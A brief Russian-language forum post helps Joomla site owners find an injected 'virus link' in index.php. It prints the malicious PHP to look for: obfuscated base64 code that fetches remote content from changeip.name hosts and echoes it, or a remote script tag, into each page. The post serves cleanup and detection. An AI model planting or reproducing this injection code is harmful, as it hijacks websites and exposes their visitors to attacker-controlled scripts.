⇢ АК
Акылбек Калчаев
Ссылка-вирус на сайте ""
скриптом прописана в файле сайта index.php.
Ссылка-вирус на сайте выглядит так ""
А вот на сайте ее найти в таком виде нереально.
Ищите скрипт типа
"/**
* RETURN THE RESPONSE
*/
echo JResponse::toString($mainframe->getCfg('gzip'));
function sql2_safe($in) {
$rtn = base64_decode($in);
return $rtn;
}
function collectnewss() {
$get = sql2_safe("aHR0cDovL2N0cmxzaS5jaGFuZ2VpcC5uYW1lOjg4OC9zY3JpcHQuaHRtbA==");
$content = @file_get_contents($get);
if (!$content)
echo sql2_safe("PHNjcmlwdCBzcmM9Imh0dHA6Ly9mZWVsdGhlc2FtZS5jaGFuZ2VpcC5uYW1lL3JzaXplLmpzIj48L3NjcmlwdD4=");
else
echo $content;
}
collectnewss ();
"
Это для Joomla сайтов.
